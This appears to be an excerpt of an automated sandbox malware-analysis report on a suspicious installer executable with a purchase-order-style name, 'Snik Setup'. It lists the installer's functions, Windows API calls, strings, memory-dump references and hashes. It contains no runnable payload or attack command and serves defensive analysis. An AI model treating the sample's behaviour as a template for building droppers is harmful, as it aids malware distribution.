                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                          • DrawTextA.USER32(00000000,Snik Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                          • String ID: F$Snik Setup
                                                                                                                                                                                                          • API String ID: 941294808-923494343
                                                                                                                                                                                                          • Opcode ID: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                                                                                                          • Instruction ID: 9af9226455e7fa8211e54ab4aa6b8deb1f4adf461e7c9b231a43246ca388c9df
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 743dd018db8a108fdfb55826faff2fb237305abb1c3a72422579a1c27d61dc24
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F0419B71804249AFCB058FA5CD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                                                                                                                                                          Function 00405A78 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 131stringmemoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(0042B5F8,NUL,?,00000000,?,00000000,00405C0B,?,?), ref: 00405A87
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405C0B,?,?), ref: 00405AAB
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(?,0042B5F8,00000400), ref: 00405AB4
                                                                                                                                                                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405917
                                                                                                                                                                                                            • Part of subcall function 00405907: lstrlenA.KERNEL32(00000000,?,00000000,00405B64,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405949
                                                                                                                                                                                                          • GetShortPathNameA.KERNEL32(0042B9F8,0042B9F8,00000400), ref: 00405AD1
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00405AEF
                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0042B9F8,C0000000,00000004,0042B9F8,?,?,?,?,?), ref: 00405B2A
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405B39
                                                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B71
                                                                                                                                                                                                          • SetFilePointer.KERNEL32(004093B0,00000000,00000000,00000000,00000000,0042B1F8,00000000,-0000000A,004093B0,00000000,[Rename],00000000,00000000,00000000), ref: 00405BC7
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00405BD8
                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405BDF
                                                                                                                                                                                                            • Part of subcall function 004059A2: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\rPO3799039985.exe,80000000,00000003), ref: 004059A6
                                                                                                                                                                                                            • Part of subcall function 004059A2: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059C8
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                                                                                                                                          • String ID: %s=%s$NUL$[Rename]
                                                                                                                                                                                                          • API String ID: 222337774-4148678300
                                                                                                                                                                                                          • Opcode ID: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                                                                                                                          • Instruction ID: 8a014ae25a2f57f4e7f496887e8afb480c0f68f452f449b39f33bde68a4ee9be
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 396ac98f4d2996a0896bc91c9097d8f7cdfcc781c751df2836a7ceba7e79aa7c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5231F370604B19ABC2206B615D49F6B3A6CDF45758F14053AFE01F62D2DA7CB800CEAD
                                                                                                                                                                                                          Function 0040540E Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405451
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405465
                                                                                                                                                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 0040547A
                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00405484
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                                                                                                                                                                                          • API String ID: 3449924974-2230009264
                                                                                                                                                                                                          • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                                          • Instruction ID: 7d6f839e8d8492d35463ff02b487d6c5a8d89e3dbffb35ab490880a12e6152a5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4010871D14259EADF11DBA0C9447EFBFB8EB14355F004176E905B6280E378A644CFAA
                                                                                                                                                                                                          Function 00405F9A Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00405FF2
                                                                                                                                                                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FFF
                                                                                                                                                                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\rPO3799039985.exe",75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406004
                                                                                                                                                                                                          • CharPrevA.USER32(?,?,75083410,C:\Users\user\AppData\Local\Temp\,00000000,004030EA,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032FF), ref: 00406014
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F9B
                                                                                                                                                                                                          • *?|<>/":, xrefs: 00405FE2
                                                                                                                                                                                                          • "C:\Users\user\Desktop\rPO3799039985.exe", xrefs: 00405FD6
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Char$Next$Prev
                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\rPO3799039985.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                          • API String ID: 589700163-177130630
                                                                                                                                                                                                          • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                                          • Instruction ID: 57e0f34d942670e43035b7c22e392f1a12bb14715b301cf1348a0c798ab9ef07
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B112751809B932AFB3256244C00B7BBFD88F57760F19007BE8D5722C2D67C5D529B6D
                                                                                                                                                                                                          Function 00403F7B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00403F98
                                                                                                                                                                                                          • GetSysColor.USER32(00000000), ref: 00403FB4
                                                                                                                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 00403FC0
                                                                                                                                                                                                          • SetBkMode.GDI32(?,?), ref: 00403FCC
                                                                                                                                                                                                          • GetSysColor.USER32(?), ref: 00403FDF
                                                                                                                                                                                                          • SetBkColor.GDI32(?,?), ref: 00403FEF
                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 00404009
                                                                                                                                                                                                          • CreateBrushIndirect.GDI32(?), ref: 00404013
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2320649405-0
                                                                                                                                                                                                          • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                                          • Instruction ID: f3431a0ddd372d44177634c3e6640760e16b4c563197d04d055afd4279a4596b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F4219F71808705ABCB209F78DD48A4BBBF8AF41704B048A2AE996F26E0C734E904CB55
                                                                                                                                                                                                          Function 00404813 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040482E
                                                                                                                                                                                                          • GetMessagePos.USER32 ref: 00404836
                                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 00404850
                                                                                                                                                                                                          • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404862
                                                                                                                                                                                                          • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404888
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                          • String ID: f
                                                                                                                                                                                                          • API String ID: 41195575-1993550816
                                                                                                                                                                                                          • Opcode ID: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                                          • Instruction ID: 72a6dff9965abeea3fde93c43f55bc8d1d0b984f63b53e8c81f3052648e7bb03
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13dcb630cae817d26763a7c5c34c1a537cec2b83c976c16d0abeb4614e4307e4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC019275D00218BADB00DBA5DC41FFEBBBCAF45711F10412BBB10B61C0C7B4A5018BA5
                                                                                                                                                                                                          Function 00402B7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
                                                                                                                                                                                                          • MulDiv.KERNEL32(000A7EB7,00000064,000A7EBB), ref: 00402BC5
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 00402BD5
                                                                                                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00402BE5
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF7
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • verifying installer: %d%%, xrefs: 00402BCF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                          • String ID: verifying installer: %d%%
                                                                                                                                                                                                          • API String ID: 1451636040-82062127
                                                                                                                                                                                                          • Opcode ID: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                                                                                                          • Instruction ID: f77185bba9c57e6aa61c0c8aee9f592e237af7c43fbef78eddb3d4185353df7a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f377c182e300eefdb83bb0ba9c57991093f425550345df3c4c3600326924e25d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001F471640208BBEF209F60DD09EAE3779EB04744F008039FA16B51D1D7B5A955DB59
                                                                                                                                                                                                          Function 00401D38 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00401D3B
                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D48
                                                                                                                                                                                                          • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D57
                                                                                                                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401D68
                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0040A818), ref: 00401DB3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                                                          • String ID: Tahoma
                                                                                                                                                                                                          • API String ID: 3808545654-3580928618
                                                                                                                                                                                                          • Opcode ID: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                                                                                                                          • Instruction ID: ad7d238852a8d87b5aaa3e6a204337ae93e1cce4a0b470fbec170e72a625d374
                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9cdf81254145861f84cf9e02fa38053c9f28bdd393431975dea51a2ca53c52c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA01D632944340AFEB0177B0AE4EBAA3FB49759309F108479F201B62E2C6790052CF6F
                                                                                                                                                                                                          Function 004026C6 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 0040276F
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402782
                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2667972263-0
                                                                                                                                                                                                          • Opcode ID: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                                                                                                                                          • Instruction ID: 5d6717e5ef000630179c441ec4dabf90fe6e4dbd5b0bc7dedcefa97c90ee8361
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77e67ac391457e8d004afc0bb320801bb8c14dfd16ab1e53836186cbf3f5f692
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1D215E71800124BBCF216FA5CE49EAE7E79EF09324F14423AF910762D1D7795D418FA9
                                                                                                                                                                                                          Function 00404709 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • lstrlenA.KERNEL32(Snik Setup: Completed,Snik Setup: Completed,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404624,000000DF,00000000,00000400,?), ref: 004047A7
                                                                                                                                                                                                          • wsprintfA.USER32 ref: 004047AF
                                                                                                                                                                                                          • SetDlgItemTextA.USER32(?,Snik Setup: Completed), ref: 004047C2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.143838009075.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.143837980480.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838035765.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838063586.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.143838195025.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_rPO3799039985.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                          • String ID: %u.%u%s%s$Snik Setup: Completed
                                                                                                                                                                                                          • API String ID: 3540041739-1446710981
                                                                                                                                                                                                          • Opcode ID: bce87859891d79834da0368510b84a142a5ae8014b8f628edfe68aeb1773e92b
